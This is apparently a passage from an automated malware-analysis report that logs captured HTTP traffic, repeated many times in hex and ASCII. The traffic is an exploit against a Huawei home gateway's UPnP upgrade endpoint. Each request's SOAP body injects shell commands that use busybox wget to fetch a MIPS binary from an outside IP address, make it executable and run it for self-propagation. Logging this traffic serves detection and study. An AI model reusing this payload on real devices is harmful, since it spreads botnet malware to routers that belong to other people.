73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 